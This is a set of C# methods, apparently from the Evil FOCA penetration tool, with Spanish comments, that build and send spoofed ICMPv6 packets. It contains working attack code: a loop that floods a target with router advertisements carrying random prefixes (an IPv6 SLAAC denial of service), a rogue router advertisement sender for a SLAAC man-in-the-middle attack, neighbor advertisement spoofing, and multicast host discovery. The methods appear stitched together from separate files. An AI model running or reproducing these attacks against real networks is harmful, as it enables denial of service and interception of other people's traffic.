private void Attack()
{
while (true)
{
try
{
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DoSSLAAC && A.attackStatus == Data.AttackStatus.Attacking))
{
if (attack is evilfoca.Data.DoSSLAACAttack)
{
for (int i = 0; i < NumberOfRouterAdvertisement; i++)
{
//MAC del equipo atacado
PhysicalAddress MACdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.mac;
//IP de origen aleatoria pero siempre de vinculo local
IPAddress IPsrc = GetRandomLocalIPv6();
//IP atacada
IPAddress IPdst = (attack as evilfoca.Data.DoSSLAACAttack).t1.ip;
ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(MACsrc, GetRandomPrefix(), true).GetBytes()));
IPv6Packet ipv6 = new IPv6Packet(IPsrc, IPdst);
ipv6.PayloadPacket = routerAdvertisement;
ipv6.HopLimit = 255;
EthernetPacket ethernet = new EthernetPacket(MACsrc, MACdst, EthernetPacketType.IpV6);
ethernet.PayloadPacket = ipv6;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
Thread.Sleep(SendDoSAttackEachXSecs * 1000);
}
catch (ThreadAbortException)
{
return;
}
catch
{
}
}
}
static public void SendNeighborAdvertisement(IPAddress ipSrc, PhysicalAddress MACSrc, IPAddress ipDest, PhysicalAddress MACDest)
{
Packet p = new EthernetPacket(MACSrc, MACDest, EthernetPacketType.IpV6);
p.PayloadPacket = new IPv6Packet(ipSrc, ipDest);
(p.PayloadPacket as IPv6Packet).HopLimit = 255;
NeighborAdvertisement NA = new NeighborAdvertisement(ipSrc, MACSrc);
ICMPv6Packet icmp = new ICMPv6Packet(new ByteArraySegment(NA.GetBytes()));
icmp.Type = (ICMPv6Types)136; //Neighbor Advertisement
icmp.Code = 0;
p.PayloadPacket.PayloadPacket = icmp;
Program.CurrentProject.data.SendPacket(p);
}
private void Attack()
{
while (true)
{
try
{
/* INICIAR EL ATAQUE MODIFICANDO LA CACHE ARP (DoS IPv4) Y LAS TABLAS DE VECINOS (IPv6 SLAAC) */
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Attacking))
{
if (attack is evilfoca.Data.MitmAttack)
{
evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack;
EthernetPacket ethernet;
{
IPAddress myIP = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(Program.CurrentProject.data.GetDevice());
PhysicalAddress myMac = Program.CurrentProject.data.GetDevice().MacAddress;
// IPv6 (de vinculo local) y MAC atacada
IPAddress IPdst = slaacMitm.t2.ip;
PhysicalAddress MACdst = slaacMitm.t2.mac;
ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(myMac, slaacMitm.prefix, false).GetBytes()));
IPv6Packet ipv6 = new IPv6Packet(myIP, IPdst);
ipv6.PayloadPacket = routerAdvertisement;
ipv6.HopLimit = 255;
ethernet = new EthernetPacket(myMac, MACdst, EthernetPacketType.IpV6);
ethernet.PayloadPacket = ipv6;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
}
/* PARAR ATAQUE Y RESTAURAR LA CACHE DNS Y TABLAS DE VECINOS */
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.SlaacMitm && A.attackStatus == Data.AttackStatus.Stopping))
{
if (attack is evilfoca.Data.MitmAttack)
{
evilfoca.Data.MitmAttack slaacMitm = (evilfoca.Data.MitmAttack)attack;
/* Enviar paquetes para que pare la denegacion de servicio IPv4 */
/* Enviar paquetes para que pare el envenenamiento de vecino IPv6 */
attack.attackStatus = Data.AttackStatus.Stop;
}
}
Thread.Sleep(SendPacketEachXSecs * 1000);
}
catch
{
}
}
}
// create multicast IPv6 ping packet
private EthernetPacket GenerateIpv6Ping()
{
var ethernetPacket = new EthernetPacket(physicalAddress, broadcastMAC, EthernetPacketType.Arp);
var ipv6Packet = new IPv6Packet(IPAddress.Parse((deviceInfo.IPv6 != string.Empty ? deviceInfo.IPv6 : deviceInfo.LinkLocal)), IPAddress.Parse("ff02::1"));
ipv6Packet.NextHeader = IPProtocolType.ICMPV6;
ethernetPacket.PayloadPacket = ipv6Packet;
var icmpv6Packet = new ICMPv6Packet(new ByteArraySegment(new byte[40]))
{
Type = ICMPv6Types.EchoRequest,
PayloadData = Encoding.ASCII.GetBytes("abcdefghijklmnopqrstuvwabcdefghi")
};
ipv6Packet.PayloadPacket = icmpv6Packet;
// ICMPv6 checksum fix
var pseudo = Network.GetPseudoHeader(ipv6Packet.SourceAddress, ipv6Packet.DestinationAddress, icmpv6Packet.Bytes.Length, 58);
icmpv6Packet.Checksum = (ushort)(ChecksumUtils.OnesComplementSum(pseudo.Concat(icmpv6Packet.Bytes).ToArray()) + 4);
return ethernetPacket;
}
public static String ICMPv6Analyzor(ref TreeView tree, ICMPv6Packet icmp)
{
string info = "\r\n---------- ICMP Header --------\r\n";
TreeNode ICMP6Node = new TreeNode("ICMP(Internet Control Message Protocol)v6 Header");
string type, code, chk, msg, ecp;
try
{
ICMP6Node.Nodes.Add(type = "Type = " + icmp.Header[0].ToString());
ICMP6Node.Nodes.Add(code = "Code = " + icmp.Header[1].ToString());
ICMP6Node.Nodes.Add(chk = "CheckSum = " + icmp.Checksum.ToString());
info += type + "\r\n" + code + "\r\n" + chk + "\r\n";
TreeNode msgNode;
int msgtype = (int)icmp.Header[0];
if (msgtype < 128)
{
msgNode = new TreeNode("Message Detail: Error Message");
msg = ICMPv6msgAnalyzor(msgtype);
msgNode.Nodes.Add(msg);
info += "Message Detail: Error Message" + "\r\n +" + msg + "\r\n";
}
else
{
msgNode = new TreeNode("Message Detail: Information Message");
msg = ICMPv6msgAnalyzor(msgtype);
msgNode.Nodes.Add(msg);
info += "Message Detail: Information Message" + "\r\n +" + msg + "\r\n";
}
ICMP6Node.Nodes.Add(msgNode);
}
catch (Exception)
{
ICMP6Node.Nodes.Add(ecp = "ICMP segment or incomplete header");
info += ecp + "\r\n";
}
tree.Nodes.Add(ICMP6Node);
return info;
}
private void HostDiscoveryPingMulticast()
{
//
// Host discovery enviando pings a las direcciones multicast
// http://dev.metasploit.com/redmine/projects/framework/repository/revisions/67120d4263806eaedcad03761439509eda5cba12/entry/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb
//
// Nota: Parece que los windows no responden a los pings mutlicasts. Los linux (backtrack) si lo hacen
//
IPAddress ipLocalLink = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(Device);
EthernetPacket ethernet = new EthernetPacket(Device.Interface.MacAddress,
new PhysicalAddress(new byte[] { 0x33, 0x33, 0x0, 0x0, 0x0, 0x1 }),
EthernetPacketType.IpV6);
ICMPv6Packet icmp = new ICMPv6Packet(new ByteArraySegment(new byte[40]))
{
Type = ICMPv6Types.EchoRequest,
PayloadData = Encoding.ASCII.GetBytes("abcdefghijklmnopqrstuvwabcdefghi")
};
IPAddress[] ipsMultiCast = new IPAddress[] {
new IPAddress(new byte[] { 0xff, 0x01, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 }),
new IPAddress(new byte[] { 0xff, 0x01, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2 }),
new IPAddress(new byte[] { 0xff, 0x02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 }),
new IPAddress(new byte[] { 0xff, 0x02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2 })
};
foreach (IPAddress ipMulticast in ipsMultiCast)
{
IPv6Packet ipv6 = new IPv6Packet(
ipLocalLink,
ipMulticast
);
ethernet.PayloadPacket = ipv6;
ipv6.PayloadPacket = icmp;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
private void HostDiscoveryRouterAdvertisement()
{
//
// Host discovery enviando router advertisements
// http://dev.metasploit.com/redmine/projects/framework/repository/revisions/67120d4263806eaedcad03761439509eda5cba12/entry/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
//
EthernetPacket ethernet = new EthernetPacket(Device.Interface.MacAddress,
new PhysicalAddress(new byte[] { 0x33, 0x33, 0x0, 0x0, 0x0, 0x1 }),
EthernetPacketType.IpV6);
IPAddress[] ipsMultiCast = new IPAddress[] {
new IPAddress(new byte[] { 0xff, 0x02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 })
};
foreach (IPAddress ipMulticast in ipsMultiCast)
{
IPv6Packet ipv6 = new IPv6Packet(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(Device), ipMulticast);
ipv6.HopLimit = 255;
ICMPv6Packet routerAdvertisement = new ICMPv6Packet(new ByteArraySegment(new ICMPv6.NeighborRouterAdvertisement(Device.Interface.MacAddress).GetBytes()));
ethernet.PayloadPacket = ipv6;
ipv6.PayloadPacket = routerAdvertisement;
Program.CurrentProject.data.SendPacket(ethernet);
}
}
